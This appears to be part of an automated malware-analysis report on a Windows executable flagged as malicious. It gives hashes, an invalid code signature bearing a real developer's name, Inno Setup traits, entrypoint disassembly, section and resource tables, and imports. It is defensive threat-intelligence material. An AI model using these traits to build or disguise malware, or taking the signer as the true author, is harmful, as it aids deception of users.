                                                                                                SHA-512:154210EC82DB87C5598F699F84DA4C5F7105676D089F54DB599D086850895BCBB69C7DD1EE9372E09AA1C77EDFEBA644CE4EE810CB961294844984355F245F98
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...{*2g.........."......T4...i...................@......................................@.........................<.=.U.....=.@.....@..H^..........,...I...`.......k=.....................Pi=......q4.............@.=.l............................text....S4......T4................. ..`.rdata..`....p4......X4.............@..@.data........ >..R....=.............@....tls....u.....?......N>.............@...CPADinfo(.....?......P>.............@...malloc_h......@......R>............. ..`.rsrc....H^...@..H^..T>.............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):6.451490735803889
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                • Inno Setup installer (109748/4) 1.08%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:FIWszl1A8l.exe
                                                                                                File size:3'213'672 bytes
                                                                                                MD5:f1c0a349ef488c9d2fde3dd7f3c497bd
                                                                                                SHA1:20eb1d3d000be4d3c06c88a54eeb57fb01b054d5
                                                                                                SHA256:38e825894f85ed654a2badb58f28b334597d2662952d9a5ec6918bd8c8b7335a
                                                                                                SHA512:5bf3959f9c0a62ce75cb7317f28d09d662567f3e8f9b067880ae464b0d6124e05f37cdc453f2029950970a002d853dc6b0797cb3627632ef8365b6a04b52e6a0
                                                                                                SSDEEP:49152:xWKtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:btLutqgwh4NYxtJpkxhGU333X
                                                                                                TLSH:99E54A27F28C713ED06B3A324A3386909837F66179168C6797FC794C8F365942A3E647
                                                                                                File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                File Icon

                                                                                                Icon Hash:0c1733515131060c

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x6c6668
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x63ECF219 [Wed Feb 15 14:54:17 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:1
                                                                                                File Version Major:6
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 06/05/2023 01:00:00 06/05/2026 00:59:59
                                                                                                Subject Chain
                                                                                                • CN=Johannes Schindelin, O=Johannes Schindelin, S=Nordrhein-Westfalen, C=DE
                                                                                                Version:3
                                                                                                Thumbprint MD5:0BDACC0E75B258864C6FFA046FF1F84A
                                                                                                Thumbprint SHA-1:3EB14A3AEF84B7153E139397F0A49E2FAC662B0E
                                                                                                Thumbprint SHA-256:637C86766A7FB03A8AF3B6D18E2F1183594BD60A75AFC1C36BA9AF46CE2A5A36
                                                                                                Serial:7D467C5AC99420F6A7E2A89ED61472B4

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                add esp, FFFFFFF0h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                mov eax, 006BABB4h
                                                                                                call 00007F4D78EBE912h
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov eax, dword ptr [eax+00000188h]
                                                                                                push FFFFFFECh
                                                                                                push eax
                                                                                                call 00007F4D78EC2CADh
                                                                                                mov edx, dword ptr [006CFF3Ch]
                                                                                                mov edx, dword ptr [edx]
                                                                                                mov edx, dword ptr [edx+00000188h]
                                                                                                and eax, FFFFFF7Fh
                                                                                                push eax
                                                                                                push FFFFFFECh
                                                                                                push edx
                                                                                                call 00007F4D78EC2C99h
                                                                                                xor eax, eax
                                                                                                push ebp
                                                                                                push 006C66F9h
                                                                                                push dword ptr fs:[eax]
                                                                                                mov dword ptr fs:[eax], esp
                                                                                                push 00000001h
                                                                                                call 00007F4D78EC1FF4h
                                                                                                call 00007F4D7916863Bh
                                                                                                mov eax, dword ptr [006BA7DCh]
                                                                                                push eax
                                                                                                push 006BA874h
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007F4D79066460h
                                                                                                mov eax, 006B5454h
                                                                                                mov edx, dword ptr [006CFDB4h]
                                                                                                mov dword ptr [edx], eax
                                                                                                call 00007F4D79168682h
                                                                                                xor eax, eax
                                                                                                pop edx
                                                                                                pop ecx
                                                                                                pop ecx
                                                                                                mov dword ptr fs:[eax], edx
                                                                                                jmp 00007F4D791743FBh
                                                                                                jmp 00007F4D78EB7217h
                                                                                                call 00007F4D791683CAh
                                                                                                mov eax, 00000001h
                                                                                                call 00007F4D78EB7D00h
                                                                                                call 00007F4D78EB765Bh
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov edx, 006C688Ch
                                                                                                call 00007F4D79065F2Ah
                                                                                                push 00000005h
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov eax, dword ptr [eax+00000188h]

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x2de0000x97.edata
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2d90000x39ba.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e10000x3ad00.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x30dc000x2d68.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2e00000x18.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2d99f00x8c4.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2dd0000xbde.didata
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x2c20c80x2c220058be6c93982a266a69bb54d7c353b95bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .itext0x2c40000x28980x2a0014817d9596460398ce8a10ec41885658False0.5013950892857143data6.097600196485659IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .data0x2c70000x92580x9400b6c68a9cc08d787f829bebe13beeebceFalse0.576198268581081data6.2228077637398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .bss0x2d10000x790c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .idata0x2d90000x39ba0x3a001c7fac207b7708f2d38f3eced48727dcFalse0.3355334051724138data5.289106478125697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .didata0x2dd0000xbde0xc00022cbd8e7ebbfb3df44dfd43f92fa718False0.3512369791666667data4.391276161587863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .edata0x2de0000x970x20029372b5d9fa8b5b431a37756aee4c5b7False0.25data1.8458344781090077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .tls0x2df0000x4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rdata0x2e00000x5d0x2000e147eb88402eb8a56f168b457309291False0.189453125data1.3507743158343073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x2e10000x3ad000x3ae0032a06d163194b2d3bf155f7a452b4065False0.46382779325902335data6.14802530245256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_CURSOR0x2e23200x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                RT_CURSOR0x2e24540x134dataEnglishUnited States0.4642857142857143
                                                                                                RT_CURSOR0x2e25880x134dataEnglishUnited States0.4805194805194805
                                                                                                RT_CURSOR0x2e26bc0x134dataEnglishUnited States0.38311688311688313
                                                                                                RT_CURSOR0x2e27f00x134dataEnglishUnited States0.36038961038961037
                                                                                                RT_CURSOR0x2e29240x134dataEnglishUnited States0.4090909090909091
                                                                                                RT_CURSOR0x2e2a580x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                RT_ICON0x2e2b8c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.04227680680207841
                                                                                                RT_ICON0x2e6db40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.07157676348547717
                                                                                                RT_ICON0x2e935c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.08794559099437148
                                                                                                RT_ICON0x2ea4040x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.11891828058573453
                                                                                                RT_ICON0x2ee62c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.1578838174273859
                                                                                                RT_ICON0x2f0bd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.010333018422295701
                                                                                                RT_ICON0x2f4dfc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.026763485477178422
                                                                                                RT_ICON0x2f73a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.02626641651031895
                                                                                                RT_ICON0x2f844c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.15806754221388367
                                                                                                RT_ICON0x2f94f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27172131147540984
                                                                                                RT_ICON0x2f9e7c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.350177304964539
                                                                                                RT_ICON0x2fa2e40x217PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0205607476635514
                                                                                                RT_ICON0x2fa4fc0x2ffPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishUnited States1.014341590612777
                                                                                                RT_ICON0x2fa7fc0x35cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0127906976744185
                                                                                                RT_ICON0x2fab580x4caPNG image data, 28 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0089722675367048
                                                                                                RT_ICON0x2fb0240x3faPNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108055009823183
                                                                                                RT_ICON0x2fb4200x577PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078627591136526
                                                                                                RT_ICON0x2fb9980x5f8PNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                RT_ICON0x2fbf900x99cPNG image data, 56 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004471544715447
                                                                                                RT_ICON0x2fc92c0xaf8PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003917378917379
                                                                                                RT_ICON0x2fd4240x75ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0058324496288442
                                                                                                RT_ICON0x2fdb840xaf3PNG image data, 72 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039243667499107
                                                                                                RT_ICON0x2fe6780xb2dPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038448095071653
                                                                                                RT_ICON0x2ff1a80xd9fPNG image data, 84 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003154574132492
                                                                                                RT_ICON0x2fff480xdc6PNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031196823596142
                                                                                                RT_ICON0x300d100x12caPNG image data, 112 x 112, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022869022869023
                                                                                                RT_ICON0x301fdc0xd03PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033023116181328
                                                                                                RT_ICON0x302ce00x152cPNG image data, 144 x 144, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002029520295203
                                                                                                RT_ICON0x30420c0x16b5PNG image data, 160 x 160, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006881128505074
                                                                                                RT_ICON0x3058c40x1d96PNG image data, 168 x 168, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                RT_ICON0x30765c0x1a2aPNG image data, 192 x 192, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9905942072260376
                                                                                                RT_ICON0x3090880x2a22PNG image data, 216 x 216, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998887446690154
                                                                                                RT_ICON0x30baac0x2c53PNG image data, 240 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9956816779765577
                                                                                                RT_ICON0x30e7000x191cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.972775357809583
                                                                                                RT_STRING0x31001c0x210data0.3125
                                                                                                RT_STRING0x31022c0x440data0.37683823529411764
                                                                                                RT_STRING0x31066c0x2b4data0.45809248554913296
                                                                                                RT_STRING0x3109200x214data0.4605263157894737
                                                                                                RT_STRING0x310b340x3e4data0.3885542168674699
                                                                                                RT_STRING0x310f180x3a0data0.4191810344827586
                                                                                                RT_STRING0x3112b80x1ecdata0.5609756097560976
                                                                                                RT_STRING0x3114a40xccdata0.6666666666666666
                                                                                                RT_STRING0x3115700x294data0.4681818181818182
                                                                                                RT_STRING0x3118040x3e8data0.372
                                                                                                RT_STRING0x311bec0x488data0.41293103448275864
                                                                                                RT_STRING0x3120740x418data0.28435114503816794
                                                                                                RT_STRING0x31248c0x370data0.4147727272727273
                                                                                                RT_STRING0x3127fc0x39cdata0.41233766233766234
                                                                                                RT_STRING0x312b980x4a4data0.382996632996633
                                                                                                RT_STRING0x31303c0x384data0.37333333333333335
                                                                                                RT_STRING0x3133c00x454data0.3935018050541516
                                                                                                RT_STRING0x3138140x210data0.39015151515151514
                                                                                                RT_STRING0x313a240xbcdata0.6542553191489362
                                                                                                RT_STRING0x313ae00x100data0.62890625
                                                                                                RT_STRING0x313be00x338data0.4223300970873786
                                                                                                RT_STRING0x313f180x3f0data0.34226190476190477
                                                                                                RT_STRING0x3143080x314data0.38578680203045684
                                                                                                RT_STRING0x31461c0x2f8data0.38026315789473686
                                                                                                RT_RCDATA0x3149140x10data1.5
                                                                                                RT_RCDATA0x3149240x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                RT_RCDATA0x3161240xb70data0.5358606557377049
                                                                                                RT_RCDATA0x316c940x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                RT_RCDATA0x316ddc0x480Delphi compiled form 'TNewDiskForm'0.5052083333333334
                                                                                                RT_RCDATA0x31725c0x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                RT_RCDATA0x31765c0x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                RT_RCDATA0x317b140x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                RT_RCDATA0x3182f80x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                RT_RCDATA0x3188540x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                RT_GROUP_CURSOR0x31b3200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                RT_GROUP_CURSOR0x31b3340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                RT_GROUP_CURSOR0x31b3480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x31b35c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x31b3700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x31b3840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x31b3980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_ICON0x31b3ac0x148dataEnglishUnited States0.6524390243902439
                                                                                                RT_GROUP_ICON0x31b4f40x30dataEnglishUnited States0.9375
                                                                                                RT_GROUP_ICON0x31b5240x22dataEnglishUnited States1.0588235294117647
                                                                                                RT_GROUP_ICON0x31b5480x30dataEnglishUnited States0.9375
                                                                                                RT_GROUP_ICON0x31b5780x30dataEnglishUnited States0.9583333333333334
                                                                                                RT_VERSION0x31b5a80x514dataEnglishUnited States0.3007692307692308
                                                                                                RT_MANIFEST0x31babc0x244XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.453448275862069

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                shell32.dllSHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                                version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                advapi32.dllRegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
                                                                                                netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                msvcrt.dllmemcpy
                                                                                                winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
